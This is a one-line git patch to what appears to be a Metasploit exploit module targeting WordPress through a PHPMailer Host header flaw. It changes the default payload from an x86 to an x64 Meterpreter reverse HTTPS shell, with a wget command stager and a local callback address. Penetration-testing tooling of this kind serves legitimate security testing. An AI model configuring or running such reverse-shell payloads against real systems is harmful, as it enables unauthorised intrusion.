From 2ae943d98157463f30129b07e73a16576b6b1040 Mon Sep 17 00:00:00 2001 From: William Vu Date: Thu, 11 May 2017 15:42:15 -0500 Subject: [PATCH] Use payload common case instead of general case Both x86 and x64 work on x64, but we really expect x64, and there's no migration to move us from x86 to x64. --- modules/exploits/unix/webapp/wp_phpmailer_host_header.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/unix/webapp/wp_phpmailer_host_header.rb b/modules/exploits/unix/webapp/wp_phpmailer_host_header.rb index aaa6e986d7..3506630226 100644 --- a/modules/exploits/unix/webapp/wp_phpmailer_host_header.rb +++ b/modules/exploits/unix/webapp/wp_phpmailer_host_header.rb @@ -40,7 +40,7 @@ class MetasploitModule < Msf::Exploit::Remote ], 'DefaultTarget' => 0, 'DefaultOptions' => { - 'PAYLOAD' => 'linux/x86/meterpreter_reverse_https', + 'PAYLOAD' => 'linux/x64/meterpreter_reverse_https', 'LHOST' => Rex::Socket.source_address, 'CMDSTAGER::FLAVOR' => 'wget' },